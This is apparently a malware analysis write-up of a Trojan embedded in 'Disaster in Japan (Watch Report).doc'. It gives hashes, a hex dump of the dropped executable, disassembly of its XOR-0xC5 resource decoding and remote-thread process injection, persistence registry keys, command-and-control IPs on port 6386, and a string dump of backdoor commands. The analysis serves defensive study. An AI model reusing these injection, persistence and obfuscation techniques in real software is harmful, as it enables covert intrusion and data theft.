Disaster in Japan (Watch Report).doc – Payload Analysis

• Today I will analyze the payload found within the following document:

File Name:  Disaster in Japan (Watch Report).doc
File Size:  62464 bytes
MD5:        7b3208b1dc28b2d5f7641aa212e6aabf
SHA1:       8a60a2183a044bbeae90f0354acdbf6f6f052925

• This document was downloaded from:
  • http://contagiodump.blogspot.com/2011/03/mar-14-cve-2010-3333-disaster-in-japan.html

• If you dump this document in your favorite Hex viewer you will soon see ASCII hex that is shellcode but I will not focus on this here.  The following analysis will focus on the payload.

• At file-offset 0×800 you will notice something that looks like the beginning of an executable file minus the MZ header and the PE header:

0800h: 00 00 90 00 03 00 00 00 04 00 00 00 FF FF 00 00  ...........ÿÿ..
0810h: B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00  ¸.......@.......
0820h: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0830h: 00 00 00 00 00 00 00 00 00 00 00 00 E0 00 00 00  ............à...
0840h: 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68  ..º..´.Í!¸.LÍ!Th
0850h: 69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F  is program canno
0860h: 74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20  t be run in DOS
0870h: 6D 6F 64 65 2E 0D 0D 0A 24 00 00 00 00 00 00 00  mode....$.......
0880h: 0F 00 83 8C 4B 61 ED DF 4B 61 ED DF 4B 61 ED DF  ..ƒŒKaíßKaíßKaíß
0890h: 29 7E FE DF 4D 61 ED DF 7D 47 E9 DF 49 61 ED DF  )~þßMaíß}GéßIaíß
08A0h: C8 7D E3 DF 49 61 ED DF 24 7E E7 DF 40 61 ED DF  È}ãßIaíß$~çß@aíß
08B0h: 24 7E E9 DF 48 61 ED DF 4B 61 EC DF 32 61 ED DF  $~éßHaíßKaìß2aíß
08C0h: 7D 47 E6 DF 4E 61 ED DF 8C 67 EB DF 4A 61 ED DF  }GæßNaíߌgëßJaíß
08D0h: 52 69 63 68 4B 61 ED DF 00 00 00 00 00 00 00 00  RichKaíß........
08E0h: 00 00 00 00 4C 01 04 00 51 B7 7D 4D 00 00 00 00  ....L...Q•}M....
08F0h: 00 00 00 00 E0 00 0F 01 0B 01 06 00 00 28 00 00  ....à........(..
0900h: 00 62 00 00 00 00 00 00 AC 32 00 00 00 10 00 00  .b......¬2......
0910h: 00 40 00 00 00 00 40 00 00 10 00 00 00 02 00 00  .@....@.........
0920h: 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00  ................
0930h: 00 B0 00 00 00 04 00 00 00 00 00 00 02 00 00 00  .°..............
0940h: 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00  ................
0950h: 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00  ................
0960h: 08 44 00 00 78 00 00 00 00 60 00 00 60 4E 00 00  .D..x....`..`N..
0970h: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0980h: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0990h: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
09A0h: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
09B0h: 00 00 00 00 00 00 00 00 00 40 00 00 F8 01 00 00  .........@..ø...
09C0h: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
09D0h: 00 00 00 00 00 00 00 00 2E 74 65 78 74 00 00 00  .........text...
09E0h: 6A 26 00 00 00 10 00 00 00 28 00 00 00 04 00 00  j&.......(......
09F0h: 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60  ............ ..`
0A00h: 2E 72 64 61 74 61 00 00 CE 0A 00 00 00 40 00 00  .rdata..Î....@..

• Once you add the MZ and PE strings to this file at file-offsets 0×800 and 0x8E0, then we have a valid executable file that I have named japan.exe.
• This file has the following characteristics:

File Name:  japan.exe
File Size:  37888 bytes
MD5:        5abd60f270b7169685dbc9e9e66a3734
SHA1:       2586d808938adf8d819a238080b20c34dc0ff294
PE Time:    0x4D7DB751 [Mon Mar 14 06:36:01 2011 UTC]
AV:         9/43 hits [VirusTotal]

• When file japan.exe is executed, it creates a copy of itself with the same name in the \Windows\system32\ folder.
• It backdates its timestamps to match those of cmd.exe.
• It sets the following value in the registry:
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system
    • Athene = [File path]\japan.exe
• It then executes \Windows\system32\japan.exe and exits.
• The newly created process (\windows\system32\japan.exe) reads the registry name Athene and retrieves the path from where this file was originally executed, and deletes that file.
• The registry name Athene is also also deleted.  So, the whole purpose of this registry entry was to temporarily store the path of the original file (i.e. the one that is dropped when the malicious document is opened) so that the second instance of the Trojan (i.e. the one running from the \windows\system32\ folder) can delete the original file.
• The Trojan then sleeps for 5 minutes.
• When it wakes up it makes a call to GetLocalTime then checks if the seconds count is less then or equal to 49.
  • If the condition is true, 10 seconds are added to the obtained value (6 in my case), and then GetLocalTime is called in a loop until the seconds matches the value (i.e. 16).  This is weird, but it is probably here to add a bit of randomness to the intervals of communication.
  • If the condition is not true, then 50 is subtracted from the number of seconds and the same loop is taken as above.
  • Here is the code for this:

0040137B  |.  68 20BF0200   PUSH 2BF20                               ; /Timeout = 180000. ms
00401380  |.  FF15 8C404000 CALL DWORD PTR DS:[<&KERNEL32.Sleep>]    ; \Sleep
00401386  |.  8D45 B4       LEA EAX, DWORD PTR SS:[EBP-4C]
00401389  |.  50            PUSH EAX                                 ; /pLocaltime
0040138A  |.  8B3D 90404000 MOV EDI, DWORD PTR DS:[<&KERNEL32.GetLoc>; |kernel32.GetLocalTime
00401390  |.  FFD7          CALL EDI                                 ; \GetLocalTime
00401392  |.  0FB745 C0     MOVZX EAX, WORD PTR SS:[EBP-40]
00401396  |.  8945 C4       MOV DWORD PTR SS:[EBP-3C], EAX
00401399  |.  83F8 31       CMP EAX, 31
0040139C  |.  7E 06         JLE SHORT japan.004013A4
0040139E  |.  836D C4 32    SUB DWORD PTR SS:[EBP-3C], 32
004013A2  |.  EB 04         JMP SHORT japan.004013A8
004013A4  |>  8345 C4 0A    ADD DWORD PTR SS:[EBP-3C], 0A
004013A8  |>  8D45 B4       /LEA EAX, DWORD PTR SS:[EBP-4C]
004013AB  |.  50            |PUSH EAX
004013AC  |.  FFD7          |CALL EDI                                ;  kernel32.GetLocalTime
004013AE  |.  0FB745 C0     |MOVZX EAX, WORD PTR SS:[EBP-40]
004013B2  |.  3B45 C4       |CMP EAX, DWORD PTR SS:[EBP-3C]

• This Trojan contains a resource named TXT, which is an obfuscated DLL.
• This resource is obfuscated by XOR-ing each byte with 0xC5, skipping NULL bytes and bytes that match the key (i.e. 0xC5).
• Here is the code for of this algorithm:

00401BA5  |> /8A0429        /MOV AL, BYTE PTR DS:[ECX+EBP]
00401BA8  |. |84C0          |TEST AL, AL
00401BAA  |. |74 09         |JE SHORT japan.00401BB5
00401BAC  |. |3C C5         |CMP AL, 0C5
00401BAE  |. |74 05         |JE SHORT japan.00401BB5
00401BB0  |. |34 C5         |XOR AL, 0C5
00401BB2  |. |880429        |MOV BYTE PTR DS:[ECX+EBP], AL
00401BB5  |> |41            |INC ECX
00401BB6  |. |3BCF          |CMP ECX, EDI
00401BB8  |.^\72 EB         \JB SHORT japan.00401BA5

• So, at this point the Trojan finds this resource, de-obfuscates it, and saves it under a file named: \WINDOWS\system32\csrls.dll.
• This DLL file has the following characteristics:

File Name:  csrls.dll
File Size:  19968 bytes
MD5:        4024b94f09aff8f0e08c758c415a8c21
SHA1:       1e8cec0d20db5c134d5a9c7908bab6313ea82e8a
PE Time:    0x4D79DBE3 [Fri Mar 11 08:22:59 2011 UTC]
AV:         5/43 hits [VirusTotal]

• The timestamps of this DLL are backdated to match those of calc.exe.  Its HIDDEN and SYSTEM attributes are turned on.
• This DLL exports one function called:  ThreadEntry.  Furthermore, its original file name may have been senddll.dll.
• The Trojan then creates the following registry entry:
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run
    • Athene: C:\WINDOWS\system32\japan.exe
• Creates a process with one of the following executable files: services.exe, iexplorer.exe, or lsass.exe.
• It opens the process and creates a thread in this process with the ThreadEntry code of csrls.dll:

00401649  |.  50            PUSH EAX                                     ; /ProcessId
0040164A  |.  53            PUSH EBX                                     ; |Inheritable
0040164B  |.  6A 2A         PUSH 2A                                      ; |Access = CREATE_THREAD|VM_OPERATION|VM_WRITE
0040164D  |.  FF15 94404000 CALL DWORD PTR DS:[<&KERNEL32.OpenProcess>]  ; \OpenProcess

004017C3  |.  53            PUSH EBX                                     ; /pBytesWritten => NULL
004017C4  |.  8B45 B0       MOV EAX, DWORD PTR SS:[EBP-50]               ; |
004017C7  |.  8B80 C4000000 MOV EAX, DWORD PTR DS:[EAX+C4]               ; |
004017CD  |.  FF70 50       PUSH DWORD PTR DS:[EAX+50]                   ; |BytesToWrite
004017D0  |.  FF75 C8       PUSH DWORD PTR SS:[EBP-38]                   ; |Buffer
004017D3  |.  FF75 E4       PUSH DWORD PTR SS:[EBP-1C]                   ; |Address
004017D6  |.  FF75 D0       PUSH DWORD PTR SS:[EBP-30]                   ; |hProcess
004017D9  |.  FF15 9C404000 CALL DWORD PTR DS:[<&KERNEL32.WriteProcessMe>; \WriteProcessMemory
004017DF  |.  85C0          TEST EAX, EAX
004017E1  |.  74 21         JE SHORT japan.00401804
004017E3  |.  53            PUSH EBX
004017E4  |.  53            PUSH EBX
004017E5  |.  FF75 D8       PUSH DWORD PTR SS:[EBP-28]
004017E8  |.  FF75 D4       PUSH DWORD PTR SS:[EBP-2C]
004017EB  |.  53            PUSH EBX
004017EC  |.  53            PUSH EBX
004017ED  |.  FF75 D0       PUSH DWORD PTR SS:[EBP-30]
004017F0  |.  FF15 A0404000 CALL DWORD PTR DS:[<&KERNEL32.CreateRemoteTh>;  kernel32.CreateRemoteThread

ANALYSIS OF CSRLS.DLL

File Name:  csrls.dll
File Size:  19968 bytes
MD5:        4024b94f09aff8f0e08c758c415a8c21
SHA1:       1e8cec0d20db5c134d5a9c7908bab6313ea82e8a
PE Time:    0x4D79DBE3 [Fri Mar 11 08:22:59 2011 UTC]
AV:         5/43 hits [VirusTotal]

• The strings of this DLL are very descriptive of some of its functionality:
  • Traverse the filesystem.
  • Upload/Download files.
  • Start/kill processes.
• Based on this string: “Mesaj de la client.  Tutol e OK” this Trojan may have its origin in Romania.
• It beacons to 65.5.227.69 over TCP port 6386 and 24.173.215.70 over TCP port 6386.
• At the time of this writing, neither IP accepted connections on port 6386.
• When a connection is established, it sends this data to the C2 node:

00000000  47 61 62 62 79 00                                Gabby.

• Later the Trojan sent machine name, IP address and country information to the C2 node (so it appears no traffic encryption occurs):

victim 192.168.1.100US

• I may continue to analyze this Trojan further another day.
• Here is a string dump from memory:

Text strings referenced in 00090000..00098FFF
Address    Disassembly      Text string
000915A3   PUSH 9619C       ASCII "Gabby"
0009188E   PUSH 9618C       ASCII "delete file"
000918AB   PUSH 96188       ASCII "OK"
0009194D   PUSH 9617C       ASCII "nosuccess"
0009195B   PUSH 9616C       ASCII "execute file"
00091A70   PUSH 96188       ASCII "OK"
00091B04   PUSH 96164       ASCII "open"
00091B1C   PUSH 9615C       ASCII "success"
00091B43   PUSH 9614C       ASCII "get file status"
00091C58   PUSH 96188       ASCII "OK"
00091D24   PUSH 96144       ASCII "file ok"
00091D90   PUSH 96138       ASCII "unavalaible"
00091FE8   PUSH 9610C       ASCII "check for file"
000920FD   PUSH 96188       ASCII "OK"
000921BA   PUSH 96144       ASCII "file ok"
00092304   PUSH 96104       ASCII "break"
00092318   PUSH 960F8       ASCII "download ok"
00092357   PUSH 960EC       ASCII "file ready"
0009238A   PUSH 96138       ASCII "unavalaible"
000923B1   PUSH 960E0       ASCII "upload file"
000924C6   PUSH 96188       ASCII "OK"
00092520   PUSH 96144       ASCII "file ok"
00092537   PUSH 960D8       ASCII "send"
0009258C   PUSH 960D0       ASCII "nopath"
000925B9   PUSH 960D8       ASCII "send"
00092661   PUSH 960D8       ASCII "send"
000926D5   PUSH 960D8       ASCII "send"
00092736   PUSH 960EC       ASCII "file ready"
0009277E   PUSH 960D8       ASCII "send"
000927A5   PUSH 960C0       ASCII "upload ok"
000927FF   PUSH 960B4       ASCII "files send"
00092927   PUSH 96188       ASCII "OK"
00092AEF   PUSH 960A8       ASCII "done"
00092B05   PUSH 9609C       ASCII "file exit"
00092B4C   PUSH 9619C       ASCII "Gabby"
00092BDA   PUSH 96070       ASCII "US"
00092C13   MOV ESI, DWORD   (Initial CPU selection)
00092D8C   PUSH 96288       ASCII "Client Ready"
00092D9C   MOV EBP, 9619C   ASCII "Gabby"
00092DA3   PUSH 96268       ASCII "Mesaj de la client. Totul e Ok"
00092DCB   PUSH 96260       ASCII "ping"
00092DDE   PUSH 96258       ASCII "pong"
00092E0F   PUSH 96250       ASCII "files"
00092E44   PUSH 96244       ASCII "getstatus"
00092E6F   PUSH 96188       ASCII "OK"
00092F90   PUSH 9622C       ASCII "Drives on computer: "
00093113   PUSH 9621C       ASCII "killserver"
00093137   PUSH 96188       ASCII "OK"
0009314B   PUSH 9620C       ASCII "ERROR_SUCCESS"
0009327F   PUSH 961FC       ASCII "restartserver"
000932A8   PUSH 96188       ASCII "OK"
000932BD   PUSH 9620C       ASCII "ERROR_SUCCESS"
000933D3   PUSH 961F0       ASCII "kill proc"
00093401   PUSH 96188       ASCII "OK"
00093451   PUSH 961D4       ASCII "Process Killed Succesfully"
0009345A   PUSH 961B4       ASCII "Process Not Killed Succesfully"
00093569   PUSH 961A4       ASCII "send processes"
0009359A   PUSH 96188       ASCII "OK"
000937F9   PUSH 960A8       ASCII "done"
00093B7B   PUSH 962A8       ASCII "HARDWARE\DESCRIPTION\System\CentralProcessor"
00093BC0   PUSH 962A4       ASCII "N/A"
00093BD9   PUSH 9629C       ASCII "~MHz"
00093BED   PUSH 96298       ASCII "%i"
00093D3D   PUSH 96010       ASCII "24.173.215.70"
00093D73   PUSH 96010       ASCII "24.173.215.70"
00093D7F   PUSH 96030       ASCII "65.5.227.69"
00093FC6   PUSH 96090       ASCII "6386"